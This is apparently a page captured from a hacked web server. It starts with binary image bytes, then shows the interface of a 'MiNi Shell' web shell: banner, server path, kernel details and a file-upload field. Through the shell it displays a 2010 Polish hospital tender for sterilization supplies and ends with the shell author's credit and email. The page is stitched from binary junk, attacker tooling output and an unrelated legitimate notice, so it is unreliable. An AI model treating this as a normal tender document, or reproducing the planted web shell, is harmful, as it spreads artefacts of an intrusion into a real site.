JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100707/199856-N-2010.html

<p class="kh_header"><b>Łomianki: dostawa materiałów do sterylizacji</b><br>
<b>Numer ogłoszenia: 199856 - 2010; data zamieszczenia: 07.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Zespół Publicznych Zakładów Opieki Zdrowotnej im. Dzieci Warszawy w Dziekanowie Leśnym , ul. Marii Konopnickiej 65, 05-092 Łomianki, woj. mazowieckie, tel. 022 7513092, 7511215-18 w. 121, faks 022 7512707.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-dziekanow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa materiałów do sterylizacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów do sterylizacji dla SZPZOZ im. Dzieci Warszawy w Dziekanowie Leśnym.
Zamówienie zostało podzielone na 2 odrębne pakiety:
W zakresie Pakietu Nr 1 jest dostawa następujacych materiałów:
1.Wskaźnik biologiczny szybkiego odczytu do pary wodnej z autoczytnikiem  Ostateczny odczyt po 3 godzinach intubacji. Odczyt automatyczny w autoczytniku, przez wskazanie koloru na wyświetlaczu. Zmiana koloru pożywki w przypadku nieprawidłowego wyniku, łatwa w interpretacji (z fioletowego na żółty). Nakrętka wskaźnika w kolorze brązowym, na fiolce repozycjonowana nierwąca się naklejka, ze wskaźnikiem chemicznym i miejscem do opisu - 800 sztuk (op. = 50 szt.)
 
2.Wskaźnik biologiczny szybkiego odczytu do pary wodnej. Ostateczny odczyt po 3 godzinach intubacji. Odczyt automatyczny w autoczytniku, przez wskazanie koloru na wyświetlaczu. Zmiana koloru pożywki w przypadku nieprawidłowego wyniku, łatwa w interpretacji (z fioletowego na żółty). Nakrętka wskaźnika w kolorze brązowym, na fiolce repozycjonowana nierwąca się naklejka, ze wskaźnikiem chemicznym i miejscem do opisu - 200 sztuk (op.= 50 szt.)

3.Wskaźnik biologiczny -  fiolkowy - do pary wodnej z inkubatorem . Ostateczny odczyt po 48 godzinach intubacji.  Zmiana koloru pożywki w przypadku nieprawidłowego wyniku, łatwa w interpretacji (z fioletowego na żółty). Nakrętka wskaźnika w kolorze brązowym, na fiolce repozycjonowana nierwąca się naklejka, ze wskaźnikiem chemicznym i miejscem do opisu. 
Inkubator, z przykrywką, do fiolkowych wskaźników biologicznych do pary wodnej. Tmp. inkubacji - 56C. Pojemność 14 wskaźników - 1 komplet (400 sztuk)

4. Fiolkowy wskaźnik biologiczny do pary wodnej. Ostateczny odczyt po 48 godzinach inkubacji. Zmiana koloru pożywki w przypadku nieprawidłowego wyniku, łatwa w interpretacji (z fioletowego na żółty). Nakrętka wskaźnika w kolorze brązowym, na fiolce repozycjonowana nierwąca się naklejka, ze wskaźnikiem chemicznym i miejscem do opisu - 4 op (w op. 100 sztuk)

5. Fiolkowy wskaźnik biologiczny  do tlenku etylenu - 400 szt. - z inkubatorem. Ostateczny odczyt po 48 godzinach intubacji.  Zmiana koloru pożywki w przypadku nieprawidłowego wyniku, łatwa w interpretacji (z zielonego na żółty). Nakrętka wskaźnika w kolorze zielonym, na fiolce repozycjonowana nierwąca się naklejka, ze wskaźnikiem chemicznym i miejscem do opisu. 
Inkubator, z przykrywką, do fiolkowych wskaźników biologicznych do tlenku etylenu. Tmp. inkubacji - 56C. Pojemność 14 wskaźników - 1 komplet

6.Fiolkowy wskaźnik biologiczny  do tlenku etylenu.  Ostateczny odczyt po 48 godzinach intubacji.  Zmiana koloru pożywki w przypadku nieprawidłowego wyniku, łatwa w interpretacji (z zielonego na żółty). Nakrętka wskaźnika w kolorze zielonym, na fiolce repozycjonowana nierwąca się naklejka, ze wskaźnikiem chemicznym i miejscem do opisu - 600 sztuk (1 op. = 100 szt.)

7. Nietoksyczny wskaźnik wieloparametrowy do sterylizacji parowej, odpowiadający klasie 6 ISO - 60 op. ( 1op. =200 szt)

8.Nietoksyczny wskaźnik wieloparametrowy do sterylizacji tlenkiem etylenu,  odpowiadający klasie 5 ISO - 8 op. (1op. =100 szt.)

9. Taśma do zamykania pakietów o wysokiej przylepności, wytrzymała na warunki sterylizacji parą wodną. Szerokość 1,9 cm dł. 55 cm - 15 rolek

10. Taśma wskaźnikowa do pary wodnej o szerokości 1,9 cm i dł 55 cm. Nieodklejająca się od pakietów podczas sterylizacji. Zmiana zabarwienia jednoznaczna i łatwa w interpretacji - 20 rolek

11. Taśma wskaźnikowa do pary wodnej o szerokości 2,5 cm i dł 55 cm. Przeznaczona do opakowań jednokrotnego użytku. Nieodklejająca się od pakietów podczas sterylizacji. Zmiana zabarwienia jednoznaczna i łatwa w interpretacji - 20 rolek

12. Pakiet jednokrotnego użytku typu Bowie - Dick, stymulujący pakiet porowaty, z arkuszem testowym zapewniającym łatwą i jednoznaczną interpretację wyniku. Zmiana koloru z czerwonego na granatowy. - 15 op. (1op. =25 sztuk)

13.Naboje gazowe STERYLGAZ GS - 1 (1 op. = 25 szt.) - 8 op.

14. Papier biały, włókno celulozowe o gramaturze nominalnej 60g/m2.
W rozmiarach:40 x 40 cm (1op =500 szt.) - 4 op; 50 x 50 cm (1op =500 szt.) - 4 op. ; 75 x 75 cm (1op =250 szt.) - 4 op. ; 100 x 100 cm (1op =250 szt.) - 1 op.

15. Włóknina, wykonana z 100% polipropylenu, trójwarstwowa budowa /SMS/, gramatura 30 -35 g/m2, bezlateksowa, mająca zastosowanie w sterylizatorach parowych i EO. Temp. topnienia 150C. Spełniająca wymogi: wytrzymałość na wypychanie  na sucho x 280 kPa (wg ISO 2758), wytrzymałość na wypychanie  na mokro x 290 kPa (wg ISO 2758), przepuszczalność powietrza x 150 L/min/100sg cm (wg EN 868 - 2). W rozmiarach:50 x 50 cm - 2500 szt. ; 75 x 75 cm - 1000 szt. ; 100 x 100 cm - 500 szt.

16. Rękaw papierowo foliowy, płaski, dł. 200 m, gramatura papieru 60g/m2, grubość foli x 52 mikrony, wskaźniki chemiczne do pary wodnej, EO. Oznaczenia i wskaźniki umieszczone na papierze po folią, wszystkie oznaczenia poza przestrzenią załadowczą, nr serii, rozmiar i nr kat. podany na rękawie, oznaczenie CE. Wytrzymałość zgrzewu do 4,5N/15mm. 
W rozmiarach:5 x 200 cm - 3 op. ;7,5 x 200 cm - 6 op. ;10 x 200 cm - 6 op. ; 15 x 200cm - 3 op. ; 20 x 200 cm - 2 op. ; 25 x 200 cm - 1 op. ; 30 x 200 cm - 1 op.

17.Rękaw papierowo - foliowy, z zakładką, dł. 100 m. Wskaźniki chemiczne do pary wodnej, EO. Oznaczenia i wskaźniki umieszczone na papierze pod folią, wszystkie oznaczenia poza przestrzenią załadowczą, nr serii, rozmiar i nr kat. podany na rękawie, oznaczenie CE.
W rozmiarach:75 x 25 x 100 mb.- 6 rolek ; 100 x 50 x 100 mb. - 8 rolek; 150 x 50 100 mb. - 4 rolki ; 200 x 55 x 100 mb. - 2 rolki ; 250 x 65 x 100 mb. - 2 rolki ; 300 x 80 x 100 mb. - 2 rolki

18. Torebki papierowo foliowe samozamykające. Wskaźniki chemiczne do pary wodnej, EO. Oznaczenia i wskaźniki umieszczone na papierze po folią, wszystkie oznaczenia poza przestrzenią załadowczą, nr serii, rozmiar i nr kat. podany na rękawie, oznaczenie CE,  w opakowaniu po 200 sztuk
W rozmiarach:
90 x 203 - 5 op.
90 x 230 - 5 op.
130 x 250 - 2 op.
140 x 360  - 3 op.
200 x 330 - 6 op.
300 x 390 - 3 op.

19. Torebki papierowo - foliowe bez zakładki. Wskaźniki chemiczne do pary wodnej, EO. Oznaczenia i wskaźniki umieszczone na papierze po folią, wszystkie oznaczenia poza przestrzenią załadowczą, nr serii, rozmiar i nr kat. podany na rękawie, oznaczenie CE, w op. po 1000 sztuk
W rozmiarach:
15 x 39 cm - 2 op.
20 x 25 cm - 2 op.
20 x 39 cm - 2 op.

20. Torebki papierowo - foliowe z fałdą. Wskaźniki chemiczne do pary wodnej, EO. Oznaczenia i wskaźniki umieszczone na papierze po folią, wszystkie oznaczenia poza przestrzenią załadowczą, nr serii, rozmiar i nr kat. podany na rękawie, oznaczenie CE, w opakowaniu po 1000 sztuk.
W rozmiarach:
10 x 4 x 30 cm - 1 op.
15 x 5 x 40 cm - 1 op.
20 x 5x 39 cm - 1 op.

21. Ochraniacze do narzędzi chirurgicznych niezawiasowych, z kieszonką umożliwiającą identyfikację narzędzia oraz wskaźnikami chemicznymi do pary wodnej i EO. W rozmiarach:
5 x12,5 cm - 1000 sztuk
8,9 x 16,8 cm - 1000 sztuk

22. Test zgrzewu Seal Check a 250 szt/ 1op. - 1 op.

23. Nietoksyczny pisak do opisywania pakietów sterylizacyjnych - w opakowaniu po 12 sztuk. 
W kolorach:czarny - 1 op. ; zielony - 1 op. ; niebieski - 1 op. 

24. Tacki celulozowe do małych pakietów. Nadające się do sterylizacji parą wodną i EO. 
Rozmiar: 21 cm x 15 cm - 300 sztuk

25. Torebki posterylizacyjne z zamknięciem samoprzylepnym - wykonane z przezroczystej folii, cechującej się wysoką wytrzymałością mechaniczną powierzchni odpornej na cięcie i przebijanie; dające się ławo otworzyć,bez narzędzi tnących. W rozmiarach:
150 mm x 250 mm  - 500 sztuk
200 mm x 300 mm  - 500 sztuk
3000 mm x 500 mm - 250 sztuk
400 mm x 550 mm -  250 sztuk

W zakresie pakietu Nr 2 jest dostawa 1 kompletu ETS rejestrator + przekaźnik danych + komputer z oprogramowaniem

Zakres zamówienia: powyżej 14 000 euro i poniżej 125 000 euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana według formuły spełnia / nie spełnia na podstawie złożonego oświadczenia zgodnie z treścią art. 22 ust. 1 ustawy  Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana według formuły spełnia / nie spełnia na podstawie złożonego oświadczenia zgodnie z treścią art. 22 ust. 1 ustawy  Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana według formuły spełnia / nie spełnia na podstawie złożonego oświadczenia zgodnie z treścią art. 22 ust. 1 ustawy  Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana według formuły spełnia / nie spełnia na podstawie złożonego oświadczenia zgodnie z treścią art. 22 ust. 1 ustawy  Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. dokumenty potwierdzające, że oferowane produkty posiadają dopuszczenie do obrotu i stosowania zgodnie z ustawą o wyrobach medycznych z dnia 20.04.2004r</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Pełnomocnictwo do podpisania oferty, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie wypisu z Krajowego Rejestru Sądowego lub zaświadczenia o prowadzeniu działalności gospodarczej - w formie oryginału lub kopii poświadczonej notarialnie.
2)	Pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy prawo zamówień publicznych w przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia.
3)	Wypełniony formularz ofertowy - załącznik nr 2 do SIWZ.
4)	Wypełniony formularz cenowy - załącznik nr 3 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w zakresie:
a.	zmiany podwykonawcy, w przypadku zadeklarowania przez Wykonawcę realizacji zamówienia przy pomocy podwykonawców, 
b.	zmiany stawki podatku VAT w przypadku zmiany przepisów ustawy o podatku od towaru i usług w odniesieniu odpowiednio do całości lub danej części wartości zamówienia, którego zmiana dotyczy,
c.	obniżenie ilości/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikającego z zaistnienia obiektywnych przesłanek konieczności takiej zmiany.
d.	wszelkich zmian umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian w obowiązujących przepisach prawa. 
e.	Zmian korzystnych dla Zamawiającego, w szczególności obniżenia cen jednostkowych dostarczanych produktów  przez Wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-dziekanow.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPZOZ im. Dzieci Warszawy w Dziekanowie leśnym, ul. M. Konopnickiej 65, 05-092 Łomianki - wersja pisemna na wniosek Wykonawcy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2010 godzina 10:00, miejsce: SZPZOZ im. Dzieci Warszawy w Dziekanowie Leśnym, ul. M. Konopnickiej 65, 05-092 Łomianki - kancelaria, wejście główne do szpitala (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com